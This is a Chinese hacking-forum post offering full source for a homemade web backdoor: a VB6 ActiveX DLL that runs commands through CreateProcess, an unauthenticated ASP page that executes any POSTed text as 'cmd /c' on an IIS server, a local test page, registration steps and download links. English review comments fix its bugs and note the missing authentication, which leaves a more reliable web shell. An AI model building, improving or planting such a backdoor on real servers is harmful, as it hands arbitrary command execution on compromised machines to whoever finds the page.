文章作者:CZY
说明其实这个东东很早就写好了,由于一直没有用
pipe读数据所以没有放上来,今天想起了,反正这几天
也在研究后门,所以就搞出来了。
程序一共有三个部分:thingdemo.dll 主DLL文件
(要用 regsvr32 c:\thingdemo.dll 注册,写 HKCR 通常需要管理员权限)
dll.asp 调用该控件的后门页面(注意:页面本身没有任何认证或命令限制,任何能访问它的人都可以以 IIS 处理该请求所用的身份——通常是匿名 IUSR 账号或被模拟的用户——执行任意命令)
webcmd.html 用于本地测试(在 IE 中以当前登录用户的身份执行命令)
其实这个东东也就等于一个自已编写的wsh控件
开发语言:vb6,asp
开发测试平台:2kpro(中文),2kserver(英文)
另说明:这个控件在9x下是不能正常运行的:(
程序及源代码下载:locking.8u8.com/hack/thingdemo.dll
locking.8u8.com/hack/dll.aspczy(主页空间不让传 asp 文件,所以加了 czy 后缀,下载后请改名为 dll.asp)
locking.8u8.com/hack/webcmd.html
过几天有空可能再多加点代码,让这个控件可以在知道admin
密码的情况下以admin身份执行命令:)
------------------------------------------dll.asp--------------------------
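<%@ Language=VBScript %>
<%
' Web front end for the thingdemo.thing COM object. Whatever arrives in the
' ".CMD" form field is prefixed with "cmd /c", executed on the server by the
' DLL (CreateProcess), and the captured output is echoed back in a <pre>.
'
' There is no authentication, session check or command restriction anywhere
' on this page: anyone who can reach it runs arbitrary commands under the
' identity IIS uses for this request (the anonymous account, or the
' impersonated user).
On Error Resume Next
Set na = Server.CreateObject("thingdemo.thing")
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
    If Not IsObject(na) Then
        ' A CreateObject failure used to be swallowed by On Error Resume Next
        ' and the page simply rendered nothing; report it instead.
        Response.Write "<pre>" & Server.HtmlEncode("Error: cannot create thingdemo.thing (is the DLL registered?): " & Err.Description) & "</pre>"
    Else
        b = "cmd /c " & szCMD
        na.name = b
        na.callcommand
        na.show
        Response.Write "<pre>"
        Response.Write Server.HtmlEncode(na.name2)
        Response.Write "</pre>"   ' was a second "<pre>", leaving the block unclosed
    End If
End If
%>
<HTML>
<title>CZY's ACTIVEx DLL BACKDOOR1.0 WEL@copyME TO BbS.NsFoCuS.NeT</title>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<!-- The echoed command must be HtmlEncoded: written raw into the value
     attribute it is a reflected XSS (a quote in the POSTed command breaks out). -->
<input type=text name=".CMD" size=45 value="<%= Server.HtmlEncode(szCMD) %>">
<input type=submit value="Run">
</FORM>
<PRE>
<br>
</PRE>
</BODY>
</HTML>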
-------------------------------------end--------------------------------
本地测试页面
--------------------------anyname.htm-------------------------------
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=vbs>
' Local test harness for the thingdemo.thing object: builds "cmd /c <text>"
' from the form field, runs it through the object and writes the captured
' output into the AAA element. Everything runs with the privileges of the
' user who opened this page in IE; there is no sandboxing of the command.
sub a(b)
    dim shellObj, cmdLine
    cmdLine = "cmd /c " & b
    set shellObj = createobject("thingdemo.thing")
    shellObj.name = cmdLine
    shellObj.callcommand
    shellObj.show
    aaa.innertext = shellObj.name2
end sub
</SCRIPT>
<META content="MSHTML 6.00.2800.1141" name=GENERATOR></HEAD>
<BODY>
<FORM name=f1><INPUT size=50 value="dir c:\" name=t1>
<INPUT onclick=vbscript:a(t1.value) type=button value="send command" name=b1>
</FORM>
<H5 id=AAA></H5></BODY></HTML>
--------------------------------------------------end---------------
------------------------------thingdemo.dll的模块--------------
Option Explicit
' Load timestamp written by Sub Main; nothing in the listings shown reads it back.
Public gdatServerStarted As Date
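Sub Main()
    ' Runs once when the component is loaded, before the first object
    ' request is served. Only records the load time in gdatServerStarted.
    gdatServerStarted = Now
    Debug.Print "Executing Sub Main"   ' was "E xecuting" (typo in the debug message)
End Sub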
'为对象提供唯一标识符的函数。
Public Function GetDebugID() As Long
    ' Hands out a process-wide, monotonically increasing id. The counter is a
    ' Static so it survives between calls; the first call returns 1.
    Static issued As Long
    GetDebugID = issued + 1
    issued = GetDebugID
End Function
-------------------------end-----------------------------
---------------------------thingdemo.dll的类模块--------------
'Option Explicit
' NOTE(review): Option Explicit is commented out, so a misspelled or
' undeclared name in this class silently becomes a Variant instead of a
' compile error (e.g. assigning to a mistyped function name returns "").
' Command line to run; the callers (dll.asp / webcmd.html) store "cmd /c <text>" here.
Public Name As String
' Output captured from the last callcommand; declared without a type, so a Variant.
Public Name2
Private mlngDebugID As Long ' backing store for the read-only DebugID property
'---------------------------------------
' Win32 imports used by ExecCmdPipe.
'---------------------------------------
' Anonymous pipe; the child's standard output is attached to the write end.
Private Declare Function CreatePipe Lib "kernel32" ( _
phReadPipe As Long, _
phWritePipe As Long, _
lpPipeAttributes As Any, _
ByVal nSize As Long) As Long
' lpBuffer is ByVal As String: VB6 marshals it as a temporary ANSI copy and
' converts it back on return, so the caller must pre-size the string and use
' at most lpNumberOfBytesRead characters of it. lpOverlapped is always 0 here.
Private Declare Function ReadFile Lib "kernel32" ( _
ByVal hFile As Long, _
ByVal lpBuffer As String, _
ByVal nNumberOfBytesToRead As Long, _
lpNumberOfBytesRead As Long, _
ByVal lpOverlapped As Any) As Long
' Handle-inheritance descriptor passed to CreatePipe and CreateProcess;
' ExecCmdPipe sets bInheritHandle = 1 so the child can use the pipe handles
' (and, since the same struct is used for the process/thread attributes,
' those handles become inheritable too).
Private Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
' Child start-up parameters. Only the fields ExecCmdPipe assigns are
' meaningful; everything else stays at its zero default.
Private Type STARTUPINFO
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
' Returned by CreateProcess; hProcess is waited on and both handles are
' closed with CloseHandle afterwards.
Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type
' ANSI CreateProcess. lpApplicationName is always passed as 0 by ExecCmdPipe,
' so the command line alone decides what runs. lpCommandLine is ByVal String,
' i.e. a temporary ANSI copy, which is fine even though the API may modify
' the buffer in place.
Private Declare Function CreateProcessA Lib "kernel32" (ByVal _
lpApplicationName As Long, ByVal lpCommandLine As String, _
lpProcessAttributes As Any, lpThreadAttributes As Any, _
ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, _
ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, _
lpStartupInfo As Any, lpProcessInformation As Any) As Long
' Blocks on the child's process handle until it exits (INFINITE below).
' NOTE(review): no TerminateProcess import, so a hung command cannot be killed
' from this module.
Private Declare Function WaitForSingleObject Lib "kernel32" _
(ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal _
hObject As Long) As Long
' Child is started minimised and without taking focus.
Const SW_SHOWMINNOACTIVE = 7
Const STARTF_USESHOWWINDOW = &H1
' -1& is &HFFFFFFFF: WaitForSingleObject never times out.
Const INFINITE = -1&
Private Const NORMAL_PRIORITY_CLASS = &H20&
' Makes CreateProcess honour the hStd* fields of STARTUPINFO.
Private Const STARTF_USESTDHANDLES = &H100&
'---------------------------------------
'---------------------------------------
' Read-only instance id assigned in Class_Initialize; only used in debug output.
Public Property Get debugID() As Long
debugID = mlngDebugID
End Property
Public Sub ReverseName()
    ' Reverses the Name property in place (leftover demo method; nothing in the
    ' listings shown calls it). An empty Name stays empty.
    Name = StrReverse(Name)
End Sub
' Executes whatever is in Name and stores the captured output in Name2.
' This is the command-execution sink of the component: Name goes to
' CreateProcess as-is, with no validation, quoting or allow-listing, and the
' child runs in the security context of whatever process hosts this DLL
' (the IIS worker for dll.asp, the browser for webcmd.html).
Public Sub callcommand()
'Shell "c:\command.com /c " & Name & ">c:\temp.txt" ' earlier version: ran the command via a temp file
Name2 = ExecCmdPipe(Name)
End Sub
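Public Sub show()
    ' Intentionally empty. The body used to be "Name2 = Name2", a leftover from
    ' the temp-file version that read the output here; callcommand now fills
    ' Name2 directly. Kept because dll.asp and webcmd.html still call na.show.
End Sub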
'Public Sub show()
'Dim str, str1
'Open "c:\temp.txt" For Input Shared As #2
' 若要以其他方式打开文件,必需先关闭此文件。
'Do While Not EOF(2) ' 循环至文件尾。
'Line Input #2, str1
'str = str + str1 + Chr(13) + Chr(10)
'Loop
'Name2 = str
'Close #2
'End Sub
Private Sub Class_Initialize()
    ' Take the next id from the module-level counter so instances can be told
    ' apart in debug output. Name is still empty when this runs.
    mlngDebugID = GetDebugID()
    Debug.Print "Initialize Thing " & debugID & ", Name=" & Name
End Sub
Private Sub Class_Terminate()
    ' Debug trace only; errors are ignored so teardown can never raise.
    On Error Resume Next
    Debug.Print "Terminate Thing " & debugID & ", Name=" & Name
End Sub
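Private Function ExecCmdPipe(ByVal CmdLine As String) As String
    ' Runs CmdLine as a child process with stdout and stderr attached to an
    ' anonymous pipe, drains the pipe until the child closes it, waits for
    ' the child to exit and returns everything it wrote (ANSI text).
    '
    ' CmdLine reaches CreateProcess exactly as given -- no parsing, quoting
    ' or allow-listing -- and the child runs in this process's security
    ' context and inherits every inheritable handle it holds
    ' (bInheritHandles = 1). There is no timeout: a command that never exits
    ' (or a grandchild that keeps the write end open) blocks the caller.
    '
    ' Returns the captured output, or an "Error: ..." string when a Win32
    ' call fails.
    Const ERROR_BROKEN_PIPE As Long = 109&   ' ReadFile: no writers left on the pipe
    Const CHUNK_SIZE As Long = 4096
    Dim proc As PROCESS_INFORMATION
    Dim start As STARTUPINFO
    Dim sa As SECURITY_ATTRIBUTES
    Dim hReadPipe As Long, hWritePipe As Long
    Dim ret As Long, bSuccess As Long, lastErr As Long
    Dim bytesread As Long
    Dim chunk As String
    Dim sReturnStr As String

    ' Inheritable pipe handles so the child can write to the pipe. (The read
    ' end is inherited as well; SetHandleInformation is not imported here.)
    sa.nLength = Len(sa)
    sa.bInheritHandle = 1&
    sa.lpSecurityDescriptor = 0&
    ret = CreatePipe(hReadPipe, hWritePipe, sa, 0)
    If ret = 0 Then
        ' Was "ExecCmd = ..." -- an undeclared Variant since Option Explicit
        ' is off -- so this failure used to surface as an empty string.
        ExecCmdPipe = "Error: CreatePipe failed. " & Err.LastDllError
        Exit Function
    End If

    start.cb = Len(start)
    start.hStdOutput = hWritePipe
    start.hStdError = hWritePipe   ' error output was previously discarded
    start.dwFlags = STARTF_USESTDHANDLES + STARTF_USESHOWWINDOW
    start.wShowWindow = SW_SHOWMINNOACTIVE

    ret = CreateProcessA(0&, CmdLine, sa, sa, 1&, _
                         NORMAL_PRIORITY_CLASS, 0&, 0&, start, proc)
    If ret <> 1 Then
        ' Bail out here: the original fell through to WaitForSingleObject on
        ' a null handle and then to a ReadFile that could never return,
        ' because our own write handle kept the pipe open.
        sReturnStr = "Error: CreateProcess failed. " & Err.LastDllError
        ret = CloseHandle(hReadPipe)
        ret = CloseHandle(hWritePipe)
        ExecCmdPipe = sReturnStr
        Exit Function
    End If

    ' Release our write end. The child now holds the only writer, so ReadFile
    ' reports ERROR_BROKEN_PIPE once it exits instead of blocking forever.
    ret = CloseHandle(hWritePipe)
    hWritePipe = 0

    ' Drain before waiting. Waiting first deadlocks as soon as the child emits
    ' more than the pipe buffer holds (it blocks on write, we block on wait),
    ' and the old single fixed-size read capped output at 10 KB.
    Do
        chunk = String$(CHUNK_SIZE, 0)
        bytesread = 0
        bSuccess = ReadFile(hReadPipe, chunk, CHUNK_SIZE, bytesread, 0&)
        lastErr = Err.LastDllError
        If bSuccess = 0 Or bytesread = 0 Then Exit Do
        sReturnStr = sReturnStr & Left$(chunk, bytesread)
    Loop
    If bSuccess = 0 And lastErr <> ERROR_BROKEN_PIPE Then
        sReturnStr = sReturnStr & "Error: ReadFile failed. " & lastErr
    End If

    ' The child has closed its end (or a read error ended the loop); reap it.
    ret = WaitForSingleObject(proc.hProcess, INFINITE)

    ret = CloseHandle(proc.hProcess)
    ret = CloseHandle(proc.hThread)
    ret = CloseHandle(hReadPipe)
    ExecCmdPipe = sReturnStr
End Function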